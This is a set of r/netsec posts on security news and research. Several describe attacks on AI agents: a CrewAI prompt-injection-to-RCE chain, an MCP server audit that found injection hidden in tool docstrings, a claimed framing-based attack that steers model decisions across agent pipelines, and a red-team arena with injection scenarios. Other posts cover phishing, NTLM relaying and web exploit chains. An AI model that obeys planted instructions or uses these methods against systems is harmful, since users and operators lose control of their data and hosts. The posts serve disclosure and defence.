Received - 2 April 2026 | /r/netsec - Information Security News & Discussion

Turning a Raspberry Pi into a "Poor Man's" Enterprise IDS/NSM using Zeek and Suricata

Hey everyone,

I've been looking for ways to get better visibility into my network traffic without dropping $500+ on dedicated hardware or running a power-hungry 1U server 24/7. I came across this guide from HookProbe that breaks down how to deploy Zeek and Suricata on a Raspberry Pi (specifically optimized for the Pi 4/5), and I thought it would be right up this sub's alley.

Link: Deploying Zeek and Suricata on Raspberry Pi for Edge Security

Why this is cool for a Homelab:

  • The "Double Whammy": It uses Suricata for signature-based detection (finding the "known bad") and Zeek for high-level metadata/network analysis (the "context"). Usually, running both on a Pi would kill the CPU, but the post goes into some decent optimization tricks.
  • Resource Management: It covers pinning network interface interrupts to specific cores and increasing ring buffer sizes so you don't drop packets when your 1Gbps fiber actually hits its peak.
  • Edge Defense: Instead of just monitoring your "main" server, the idea is to place these at the "edge" (connected to a mirror/SPAN port on your switch) to see everything (IoT devices, guest Wi-Fi, etc.) before it even hits your core network.
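The tuning the post describes boils down to a couple of host-level knobs. A minimal sketch, assuming the capture interface is eth0 on a 4-core Pi 4/5; the interface name, ring size, core mask, and `<IRQ_NUMBER>` are placeholders you'd adapt to your hardware:

```sh
# Enlarge the NIC receive ring so traffic bursts queue instead of dropping
# (max supported size varies by driver; check `ethtool -g eth0` first)
sudo ethtool -G eth0 rx 4096

# Find the IRQ line(s) used by the NIC
grep eth0 /proc/interrupts

# Pin that IRQ to core 2 (CPU mask 0x4), keeping the other cores free for
# Zeek/Suricata worker threads; substitute the IRQ number found above
echo 4 | sudo tee /proc/irq/<IRQ_NUMBER>/smp_affinity
```

Note the affinity setting doesn't survive a reboot unless you persist it (e.g. via a systemd unit or irqbalance ban list).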

The Setup: The guide walks through the /etc configurations for both tools. If you're like me and love structured logs (DNS queries, SSL handshakes, HTTP headers) for your ELK stack or Grafana dashboards, Zeek is a goldmine.
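To give a feel for why Zeek's output is so pipeline-friendly: with JSON logging enabled (`redef LogAscii::use_json = T;`), each dns.log line is a flat JSON record you can index directly. The field names below follow Zeek's dns.log schema; the values are made up for illustration:

```python
import json

# One line of a Zeek dns.log written with JSON output enabled.
sample = ('{"ts": 1774000000.1, "id.orig_h": "192.168.1.50", '
          '"query": "example.com", "qtype_name": "A", '
          '"answers": ["93.184.216.34"]}')

record = json.loads(sample)

# Flatten into something an ELK/Grafana pipeline can ingest directly
doc = {
    "timestamp": record["ts"],
    "client": record["id.orig_h"],
    "dns_query": record["query"],
    "dns_type": record["qtype_name"],
    "dns_answers": record.get("answers", []),
}
print(doc["dns_query"])  # example.com
```

The same pattern works for ssl.log, http.log, conn.log, etc. - one JSON object per event, stable field names per log type.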

Some questions for the community:

  1. Is anyone else running Zeek/Suricata on ARM hardware? How are you handling the heat/throttling during heavy traffic?
  2. Are you using a managed switch with a SPAN port, or are you using a hardware tap to feed the Pi?
  3. For those using the Pi 5, have you noticed a significant jump in PPS (packets per second) handling compared to the Pi 4?

I'm planning to set this up this weekend to feed into my local SOC dashboard. If you're looking for a low-cost way to move past "just a basic firewall," this seems like a solid weekend project.

Curious to hear if anyone has tried a similar "Edge Security" approach!

submitted by /u/robobostes
[link] [comments]

red team sandbox with real detection

Built a free red team arena for testing real attack paths against a live defense system, ShieldNet DLX7.

This is NOT a CTF or a static lab. It actually responds to what you do.

Current scenarios:

  • prompt injection bypass
  • DOM tamper (including honeytrap detection)
  • JWT forging (alg confusion, role escalation)
  • API exfil (debug routes, traversal)
  • indirect injection (markdown, SVG, base64 payloads)

Everything runs in a sandbox. No production targets. Novel attacks generate detection rules that get reviewed and pushed into the system.
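For anyone new to the JWT scenario: the classic "alg confusion" probe is to send a token that simply claims no signature algorithm. A minimal sketch (the claim names like "role" are illustrative, not from the site):

```python
import base64
import json

def b64url(data: bytes) -> str:
    # JWTs use unpadded base64url encoding
    return base64.urlsafe_b64encode(data).rstrip(b"=").decode()

# Claim alg=none and an escalated role; no key material needed
header = b64url(json.dumps({"alg": "none", "typ": "JWT"}).encode())
payload = b64url(json.dumps({"sub": "attacker", "role": "admin"}).encode())
forged = f"{header}.{payload}."  # empty signature segment

print(forged.count("."))  # 2 - a structurally valid three-part token
```

A correct verifier rejects this outright; a vulnerable one accepts the empty signature and trusts the payload.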

If you want to test how your payloads actually hold up against modern defenses, this is useful.

https://www.shieldnet.app/red-team-arena.html

submitted by /u/No-Magazine2625
[link] [comments]

4 unpatched CVEs in CrewAI chain prompt injection → sandbox bypass → RCE on host

Researcher Yarden Porat (Cyata) disclosed a vulnerability chain in CrewAI, the widely-used Python multi-agent framework. CERT/CC advisory VU#221883. No full patch released yet.

The chain:

CVE-2026-2275 - Code Interpreter silently falls back to SandboxPython when Docker is unavailable. SandboxPython allows arbitrary C function calls → RCE.

CVE-2026-2287 - CrewAI does not continuously verify Docker availability during runtime. An attacker who triggers the fallback mid-execution lands in the vulnerable sandbox.

CVE-2026-2285 - JSON loader tool reads files without path validation. Arbitrary local file read.

CVE-2026-2286 - RAG search tools don't validate runtime URLs → SSRF to internal services and cloud metadata endpoints.

Attack entry point: prompt injection against any agent with Code Interpreter Tool enabled. The attacker doesn't need code execution access to the host; they just need to reach the agent with crafted input.

Scope: Any CrewAI deployment running Code Interpreter Tool where Docker is not guaranteed to be available (or can be disrupted). Default "unsafe mode" config is fully exposed.

Current status: CrewAI maintainers are working on mitigations (fail closed instead of fallback, block C modules, clearer warnings). Not released. No CVSSv3 scores published yet.
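For readers sketching their own interim mitigation, the "fail closed instead of fallback" idea looks roughly like this. All names here are hypothetical - this is a sketch of the behavior the maintainers are reportedly pursuing, not CrewAI's actual API:

```python
class SandboxUnavailableError(RuntimeError):
    """Raised instead of silently degrading to a weaker sandbox."""

def pick_executor(docker_path, require_docker=True):
    # Fail closed: if Docker is gone, refuse to run code at all rather
    # than fall back to an in-process SandboxPython-style interpreter.
    if docker_path is None:
        if require_docker:
            raise SandboxUnavailableError(
                "Docker unavailable: refusing in-process sandbox fallback"
            )
        return "unsafe-in-process"  # today's vulnerable fallback behavior
    return "docker"

# At the call site you'd pass e.g. shutil.which("docker") as docker_path,
# and re-check it before every execution, not just at startup (CVE-2026-2287).
```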

Has anyone tested whether the Docker availability check can be disrupted mid-execution in a containerized deployment, or does that attack path require an already-degraded environment?

submitted by /u/AICyberPro
[link] [comments]

AI interview startup Mercor AI breached via LiteLLM supply chain attack. Lapsus$ claims 4 TB of data stolen, including 211 GB of candidate records and 3 TB of video interviews

On March 24, 2026, Mercor AI was reportedly affected by a breach linked to the hacking group Lapsus$. The incident is believed to have originated from a supply chain attack involving a compromised LiteLLM package, which may have been inadvertently pulled by one of Mercor’s AI agents.

Through this vector, attackers allegedly gained access to internal systems, including Tailscale VPN credentials, and exfiltrated approximately 4TB of data. The leaked data reportedly included 211GB of candidate records, 939GB of source code, and around 3TB of video interviews and identity documents.

In a public statement on X (formerly Twitter), Mercor said it had identified itself as one of many companies impacted by the LiteLLM supply chain attack, and that its security team acted quickly to contain the breach and begin remediation efforts. A possible attack-chain pathway is linked.

submitted by /u/raptorhunter22
[link] [comments]
Received - 1 April 2026 | /r/netsec - Information Security News & Discussion

AI-Generated Calendar Event Phishing w/ Dynamic Landing Pages

It's crazy how things come full circle more than a decade later.

About a decade ago, I got interested in calendar phishing after seeing Beau Bullock's work at BHIS. Around that time, I built and shared some of my own Graph API scripts for calendar phishing, added support for it in my open source PhishAPI tool, and even introduced the idea to KnowBe4 so they could eventually bring it into phishing training for clients (Kevin Mitnick himself demonstrated the technique using Beau's command-line tool).

I brought it to their attention at a client's request after using the technique successfully on them, during a time when calendar phishing was still largely overlooked as a real-world attack path.

Back then, it was still niche enough that plenty of defenders were not thinking about calendar invites as a phishing channel at all.

More than a decade later, I'm still refining the concept, now as part of the commercial PhishU Framework.

I'm happy to say the Framework fully supports Calendar Event phishing again, but now in a much more usable way:

  • Native calendar event workflow
  • Simple WYSIWYG w/ AI-generated timing suggestions and content
  • As easy as selecting the Calendar Event template
  • Automatically tied into training when used in a campaign

It's built for red teams and security teams that want realistic phishing assessments, including credential and session capture paths, not just allow-list-only email testing.

submitted by /u/IndySecMan
[link] [comments]

Authority Encoding Risk (AER)

Most AI discussions focus on correctness.

Accuracy. Alignment. Output quality.

But there's a more fundamental problem underneath all of that:

Who, or what, is actually allowed to execute a decision?

---

I just published a paper introducing:

Authority Encoding Risk (AER)

A measurable variable for something most systems don't track at all:

Authority ambiguity at the moment of execution.

---

Today's systems can tell you:

  • if something is likely correct
  • if it follows policy
  • if it appears safe

But they cannot reliably answer:

Is this decision admissible under real-world authority constraints?

---

That gap shows up in:

  • automation systems
  • AI-assisted decisions
  • institutional workflows
  • underwriting and loss modeling

And right now, it's largely invisible.

---

The paper breaks down:

  • how authority ambiguity propagates into risk
  • why existing frameworks fail to capture it
  • how it can be measured before loss occurs

---

If you're working anywhere near AI, risk, infrastructure, or decision systems, this is a layer worth paying attention to.

---

There's a category of risk most AI systems don't even know exists.

This paper represents an initial formulation.

Ongoing work is focused on tightening definitions, expanding evidence, and strengthening the model.

https://papers.ssrn.com/sol3/papers.cfm?abstract_id=6229278

submitted by /u/Dramatic-Ebb-7165
[link] [comments]

Market Bifurcation in Pentesting by 2026 (37%) - AI May Split the Field in Two Rather Than Flatten It, and That Changes Everything About Who Survives the Disruption

By the end of 2026, will the penetration testing market bifurcate, such that (a) average prices for traditional high-end pentests remain within 20 percent of 2024 rates, AND (b) AI-automated pentest offerings commoditize the low end at prices comparable to vulnerability scanning tools like Qualys or Tenable (under $10K per year for equivalent coverage), rather than AI displacing mid-career pentesters through firm closures and broad price compression across all tiers?

submitted by /u/ok_bye_now_
[link] [comments]

PSA: That 'Disable NTLMv1' GPO you set years ago? It's lying to you. LmCompatibilityLevel set to 5 is not enough.

If you set LmCompatibilityLevel to 5 a couple years back and called it done, there's a good chance NTLMv1 is still running in your environment. Not because the setting doesn't work. Because it doesn't work the way you think it does.

This isn't just aimed at people who never fully switched to Kerberos. It's also for the ones who are pretty sure they did.

For people not deep into auth protocols: NTLMv1 and NTLMv2 are both considered unsafe today, NTLMv1 especially. It uses DES-based encryption, which with a weak password can be cracked in seconds. And because NTLM never sends your actual password (it's challenge-response: the response is derived from the hash, not the plaintext), it's also wide open to pass-the-hash, where an attacker intercepts the hash and reuses it to authenticate as you. Responder is the tool that makes this trivial, and it's been around forever. Silverfort's research puts 64% of authentications in AD environments still on NTLM.

Here's the actual problem with the registry fix. LmCompatibilityLevel is supposed to tell your DCs to reject NTLMv1 traffic and require NTLMv2 or Kerberos instead. Sounds reasonable. But enforcement runs through the Netlogon Remote Protocol (MS-NRPC), the mechanism application servers use to forward auth requests to your domain controllers. There's a structure in that protocol called NETLOGON_LOGON_IDENTITY_INFO with a field called ParameterControl. That field contains a flag that can explicitly request NTLMv1, and your DC will honor it regardless of what Group Policy says.

The policy controls what Windows clients send. It has no authority over what applications request on the server side. Any third party or homegrown app that hasn't been audited can still be sending NTLMv1 traffic and you'd have no idea.

Silverfort built a POC to confirm this. They set the ParameterControl flag in a simulated misconfigured service and forced NTLMv1 authentications through a DC that was configured to block them. Worked. They reported it to Microsoft; Microsoft confirmed it but didn't classify it as a vulnerability. Their response was to announce full removal of NTLMv1 starting with Windows Server 2025 and Windows 11 24H2. So that's something, at least.

If you're not on those versions, you're still exposed and there's no patch coming.

What you can do right now: turn on NTLM audit logging across your domain. Registry keys exist to capture all NTLM traffic so you can actually see what's authenticating how. From there, map every app using NTLM, whether primary or as a fallback, and look specifically for anything requesting NTLMv1 messages. That's your exposure.
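For reference, the audit knobs alluded to above map to the "Network security: Restrict NTLM" policies. To the best of my knowledge these are the corresponding registry values; verify against Microsoft's documentation before rolling out via GPO:

```bat
:: Audit outgoing NTLM from this machine (1 = audit all)
reg add "HKLM\SYSTEM\CurrentControlSet\Control\Lsa\MSV1_0" /v RestrictSendingNTLMTraffic /t REG_DWORD /d 1 /f

:: Audit incoming NTLM traffic (2 = enable auditing for all accounts)
reg add "HKLM\SYSTEM\CurrentControlSet\Control\Lsa\MSV1_0" /v AuditReceivingNTLMTraffic /t REG_DWORD /d 2 /f

:: On domain controllers: audit NTLM authentication in this domain (7 = enable all)
reg add "HKLM\SYSTEM\CurrentControlSet\Services\Netlogon\Parameters" /v AuditNTLMInDomain /t REG_DWORD /d 7 /f
```

The resulting events (IDs 8001-8004) land under Applications and Services Logs > Microsoft > Windows > NTLM > Operational, which gives you the per-application NTLM usage you need to start mapping.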

submitted by /u/hardeningbrief
[link] [comments]
Received - 31 March 2026 | /r/netsec - Information Security News & Discussion

Your Agent Runs Code You Never Wrote - Why agent isolation is a different problem

I looked at how Cursor, Claude Code, Devin, OpenAI, and E2B actually isolate agent workloads today. The range goes from literally no sandbox (Cursor runs commands in your shell) to hardware-isolated Firecracker microVMs (E2B).

Container runtimes have had escape CVEs every year since 2019. Firecracker: zero guest-to-host escapes in seven years. AWS themselves said "we do not consider containers a security boundary."

The post covers five assumptions traditional isolation makes that agents break, real incidents (Devin taken over via one poisoned GitHub issue, Slack AI exfiltration, Clinejection supply chain attack), and the six dimensions of isolation I'll be exploring in this series.

submitted by /u/bakibab
[link] [comments]

Axios npm package compromised in supply chain attack. Downloads malware dropper package

Axios is one of the most used npm packages, and it just got hit by a supply chain attack. Malicious versions of Axios (1.14.1 and 0.30.4) hit the npm registry yesterday. They carry a malware dropper called plain-crypto-js@4.2.1. If you ran npm install in the last 24 hours, check your lockfile. Roll back to 1.14.0 and rotate every credential that was in your environment. npm has since removed the compromised axios versions along with the malicious plain-crypto-js package. Live updates + info linked.
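A quick way to do the lockfile check without eyeballing it - a minimal sketch that scans an npm v2/v3 package-lock.json for the versions named above (the sample lockfile fragment is made up for illustration):

```python
import json

COMPROMISED = {
    "axios": {"1.14.1", "0.30.4"},
    "plain-crypto-js": {"4.2.1"},
}

def find_compromised(lockfile_text: str):
    """Scan the 'packages' map of a package-lock.json for bad versions."""
    lock = json.loads(lockfile_text)
    hits = []
    for path, meta in lock.get("packages", {}).items():
        # Keys look like "node_modules/axios"; "" is the root package
        name = path.rsplit("node_modules/", 1)[-1] if path else lock.get("name", "")
        if meta.get("version") in COMPROMISED.get(name, set()):
            hits.append((name, meta["version"]))
    return hits

# Illustrative lockfile fragment
sample = json.dumps({
    "packages": {
        "node_modules/axios": {"version": "1.14.1"},
        "node_modules/left-pad": {"version": "1.3.0"},
    }
})
print(find_compromised(sample))  # [('axios', '1.14.1')]
```

Run it against the real file with `find_compromised(open("package-lock.json").read())`; an empty list just means the lockfile is clean, not that already-executed install scripts were harmless.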

submitted by /u/raptorhunter22
[link] [comments]
Received - 30 March 2026 | /r/netsec - Information Security News & Discussion

One POST request, six API keys: breaking into popular MCP servers

tl;dr - one POST request decrypted every API key in a 14K-star project. tested 5 more MCP servers, found RCE, SSRF, prompt injection, and command injection. 70K combined github stars, zero auth on most of them.

  • archon (13.7K stars): zero auth on entire credential API. one POST to /api/credentials/status-check returns every stored API key decrypted in plaintext. can also create and delete credentials. CORS is *, server binds 0.0.0.0

  • blender-mcp (18K stars): prompt injection hidden in tool docstrings. the server instructs the AI to "silently remember" your API key type without telling you. also unsandboxed exec() for code execution

  • claude-flow (27K stars): hardcoded --dangerously-skip permissions on every spawned claude process. 6 execSync calls with unsanitized string interpolation. textbook command injection

  • deep-research (4.5K stars): MD5 auth bypass on crawler endpoint (empty password = trivial to compute). once past that, full SSRF - no URL validation at all. also promptOverrides lets you replace the system prompt, and CORS is *

  • mcp-feedback-enhanced (3.6K stars): unauthenticated websocket accepts run_command messages. got env vars, ssh keys, aws creds. weak command blocklist bypassable with python3 -c

  • figma-console-mcp (1.3K stars, 71K weekly npm downloads): readFileSync on user-controlled paths, directory traversal, websocket accepts connections with no origin header, any local process can register as a fake figma plugin and intercept all AI commands

all tested against real published packages, no modified code. exploit scripts and evidence logs linked in the post.
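On the deep-research MD5 bypass specifically: md5 of the empty string is a well-known constant, so any endpoint that compares md5(password) against a hash of an unset (empty) password effectively has no auth at all. The check below is a hypothetical sketch of that shape, not the project's actual code:

```python
import hashlib

# md5("") - a constant any attacker can precompute
empty_digest = hashlib.md5(b"").hexdigest()
print(empty_digest)  # d41d8cd98f00b204e9800998ecf8427e

def check_auth(supplied_hash: str, configured_password: str = "") -> bool:
    # Hypothetical vulnerable check: operator never set a password,
    # so the "secret" being hashed is the empty string
    return supplied_hash == hashlib.md5(configured_password.encode()).hexdigest()

print(check_auth(empty_digest))  # True - send a constant, get in
```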

the common theme: MCP has no auth standard so most servers just ship without any.

submitted by /u/Kind-Release-3817
[link] [comments]

An attack class that passes every current LLM filter

https://shapingrooms.com/research

I opened OWASP issue #807 a few weeks ago proposing a new attack class. The paper is published today following coordinated disclosure to Anthropic, OpenAI, Google, xAI, CERT/CC, OWASP, and agentic framework maintainers.

Here is what I found.

Ordinary language buried in prior context shifts how a model reasons about a consequential decision before any instruction arrives. No adversarial signature. No override command. The model executes its instructions faithfully, just from a different starting angle than the operator intended.

I know that sounds like normal context sensitivity. It isn't, or at least the effect size is much larger than I expected. Matched control text of identical length and semantic similarity produced significantly smaller directional shifts. This specific class of language appears to be modeled differently. I documented binary decision reversals with paired controls across four frontier models.

The distinction from prompt injection: there is no payload. Current defenses scan for facts disguised as commands. This is frames disguised as facts. Nothing for current filters to catch.

In agentic pipelines it gets worse. Posture installs in Agent A, survives summarization, and by Agent C reads as independent expert judgment. No phrase to point to in the logs. The decision was shaped before it was made.

If you have seen unexplained directional drift in a pipeline and couldn't find the source, this may be what you were looking at. The lens might give you something to work with.

I don't have all the answers. The methodology is black-box observational, no model internals access, small N on the propagation findings. Limitations are stated plainly in the paper. This needs more investigation, larger N, and ideally labs with internals access stress-testing it properly.

If you want to verify it yourself, demos are at https://shapingrooms.com/demos - run them against any frontier model. If you have a production pipeline that processes retrieved documents or passes summaries between agents, it may be worth applying this lens to your own context flow.

Happy to discuss methodology, findings, or pushback on the framing. The OWASP thread already has some useful discussion from independent researchers who have documented related patterns in production.

GitHub issue: https://github.com/OWASP/www-project-top-10-for-large-language-model-applications/issues/807

submitted by /u/lurkyloon
[link] [comments]
Received - 29 March 2026 | /r/netsec - Information Security News & Discussion

pentest-ai - 6 Claude Code subagents for offensive security research (engagement planning, recon analysis, exploit methodology, detection engineering, STIG compliance, report writing)

I built a set of Claude Code subagents designed for pentesters and red teamers doing authorized engagements.

What it does: You install 6 agent files into Claude Code, and it automatically routes to the right specialist based on what you're working on. Paste Nmap output and it prioritizes attack vectors with follow-up commands. Ask about an AD attack and it gives you the methodology AND the detection perspective. Ask it to write a report finding and it formats it to PTES standards with CVSS scoring.

The agents cover:

- Engagement planning with MITRE ATT&CK mapping
- Recon/scan output analysis (Nmap, Nessus, BloodHound, etc.)
- Exploitation methodology with defensive perspective built in
- Detection rule generation (Sigma, Splunk SPL, Elastic KQL)
- DISA STIG compliance analysis with keep-open justifications
- Professional pentest report writing

Every technique references ATT&CK IDs, and the exploit guide agent is required to explain what the attack looks like from the blue team side, so it's useful for purple team work too.
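To give a sense of the target output format, here is a minimal Sigma rule of the kind the detection agent aims for. This example is illustrative and written by hand, not taken from the repo:

```yaml
title: Suspicious Nltest Domain Trust Discovery
status: experimental
description: Illustrative example only - detects nltest enumerating domain trusts
references:
    - https://attack.mitre.org/techniques/T1482/
logsource:
    category: process_creation
    product: windows
detection:
    selection:
        Image|endswith: '\nltest.exe'
        CommandLine|contains: '/domain_trusts'
    condition: selection
falsepositives:
    - Administrative scripts that enumerate trusts
level: medium
tags:
    - attack.discovery
    - attack.t1482
```

The ATT&CK tag (T1482, Domain Trust Discovery) is the kind of mapping the agents are expected to emit alongside each rule.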

Repo has example outputs so you can see the quality before installing: https://github.com/0xSteph/pentest-ai/tree/main/examples

Open to feedback. If you think an agent is missing or the methodology is off somewhere, PRs are welcome.

submitted by /u/stephnot
[link] [comments]

Chaining file upload bypass and stored XSS to create admin accounts: walkthrough with Docker PoC lab

Write up of a vulnerability chain from a recent SaaS pen test. Two medium-severity findings (file upload bypass and stored XSS) chained together for full admin account creation.

The target had CSP restricting script sources to self, CORS locked down, and CSRF tokens on forms. All functioning correctly. The chain bypassed everything by staying same-origin the entire way.

The file upload had no server-side validation (client-side accept=".pdf" only), so we uploaded a JS payload. It got served back from the app's own download endpoint on the same origin. The stored XSS in the admin inbox messaging system loaded it via an <img onerror> handler that fetched the payload and eval'd it. The payload created a backdoor admin account using the admin's session cookie.

CSP didn't block it because the script was hosted same-origin via the upload. CORS irrelevant since nothing crossed an origin boundary. CSRF tokens didn't matter because same-origin JS can read the DOM and grab them anyway.
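The root-cause fix is server-side validation of both extension and content, since the client-side accept=".pdf" filter is attacker-controlled. A minimal sketch (shown in Python for brevity; the lab app itself is PHP, and function names here are illustrative):

```python
def looks_like_pdf(data: bytes, filename: str) -> bool:
    """Server-side check the vulnerable app skipped: verify the extension
    AND the content's magic bytes; never trust the client-side filter."""
    if not filename.lower().endswith(".pdf"):
        return False
    return data.startswith(b"%PDF-")

print(looks_like_pdf(b"%PDF-1.7 ...", "report.pdf"))       # True
print(looks_like_pdf(b"fetch('/x').then(eval)", "x.pdf"))  # False
```

Even with validation, serving uploads with `Content-Disposition: attachment` and `X-Content-Type-Options: nosniff` (or from a separate origin) would have defanged the same-origin script-hosting trick this chain relied on.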

Full write up with attack steps, code, and screenshots: https://kurtisebear.com/2026/03/28/chaining-file-upload-xss-admin-compromise/

Also built a Docker lab that reproduces the exact chain with the security controls in place. PHP app, both vulns baked in, admin + user accounts seeded. Clone and docker-compose up: https://github.com/echosecure/vuln-chain-lab

submitted by /u/kurtisebear
[link] [comments]
Received - 27 March 2026 | /r/netsec - Information Security News & Discussion

DVRTC: intentionally vulnerable VoIP/WebRTC lab with SIP enumeration, RTP bleed, TURN abuse, and credential cracking exercises

Author here. DVRTC is our attempt to fill a gap that's been there for a while: web app security has DVWA and friends, but there's been nothing equivalent for VoIP and WebRTC attack techniques.

The first scenario (pbx1) deploys a full stack - Kamailio as the SIP proxy, Asterisk as the back-end PBX, rtpengine for media, coturn for TURN/STUN - with each component configured to exhibit specific vulnerable behaviors:

  • Kamailio returns distinguishable responses for valid vs. invalid extensions (enumeration), logs User-Agent headers to MySQL without sanitisation (SQLi), and has a special handler that triggers digest auth leaks for extension 2000
  • rtpengine uses its default configuration, which enables RTP bleed (leaking media from other sessions) and RTP injection
  • coturn uses hardcoded credentials and a permissive relay policy for the TURN abuse exercise
  • Asterisk has extension 1000 with a weak password (1500) for online cracking

7 exercises with step-by-step instructions. There's also a live instance at pbx1.dvrtc.net if you want to try it without standing up your own.
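For anyone curious what the cracking exercise involves mechanically: SIP uses RFC 2617-style digest auth, so a captured challenge/response can be attacked offline by recomputing the digest per candidate password. A sketch (qop/cnonce omitted for brevity; the nonce and URI values here are made up, the weak password "1500" matches the lab):

```python
import hashlib

def md5hex(s: str) -> str:
    return hashlib.md5(s.encode()).hexdigest()

def sip_digest_response(user, realm, password, method, uri, nonce):
    # RFC 2617 digest without qop: MD5(HA1:nonce:HA2)
    ha1 = md5hex(f"{user}:{realm}:{password}")
    ha2 = md5hex(f"{method}:{uri}")
    return md5hex(f"{ha1}:{nonce}:{ha2}")

# Simulated capture from the lab's weak extension (values illustrative)
captured = sip_digest_response("1000", "asterisk", "1500",
                               "REGISTER", "sip:pbx1", "abc123")

# Offline dictionary attack: recompute until the response matches
for guess in ["0000", "1234", "1500", "letmein"]:
    if sip_digest_response("1000", "asterisk", guess,
                           "REGISTER", "sip:pbx1", "abc123") == captured:
        print(f"cracked: {guess}")  # cracked: 1500
        break
```

Tools like sipcrack automate exactly this loop against pcap captures.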

Happy to answer questions.

submitted by /u/EnableSecurity
[link] [comments]
Received - 26 March 2026 | /r/netsec - Information Security News & Discussion

The Age-Gated Internet: Child Safety, Identity Infrastructure, and the Not So Quiet Re-Architecting of the Web

In enterprise environments, identity effectively became the control plane once network perimeters broke down (zero trust being the obvious example).

I'm seeing a similar pattern emerging on the public internet via age verification and safety regulation, but with identity moving closer to the access layer itself.

Not just: "Are you over 18?"

But: identity assertions are becoming part of how access is granted at the OS/device/app store level.

From a security perspective, this seems to introduce some new attack surfaces:

  • high-value identity tokens at the OS/device level
  • new trust boundaries between apps, OS, and third-party verifiers
  • incentives to target device compromise or token reuse rather than account-level bypass
  • potential centralisation of identity providers as enforcement points

Questions I'm trying to think through:

  • Does this effectively make identity providers the new perimeter/control plane?
  • How would you model this system (closer to DRM, identity federation, or something else?)
  • What are the likely failure modes if this layer becomes centralised?
  • Are decentralised / on-device credentials actually viable from a security standpoint, or do they just shift the attack surface?

Curious how people here would threat model this or where the obvious breakpoints are.

submitted by /u/wayne_horkan
[link] [comments]

Making NTLM-Relaying Relevant Again by Attacking Web Servers with WebRelayX

NTLM relaying has been proclaimed dead a number of times; signing requirements for SMB and LDAP make it nearly impossible to use captured NTLM authentications anymore. However, it is still possible to relay to many web servers that do not enforce Extended Protection for Authentication (not just ADCS / ESC8).

submitted by /u/seccore_gmbh
[link] [comments]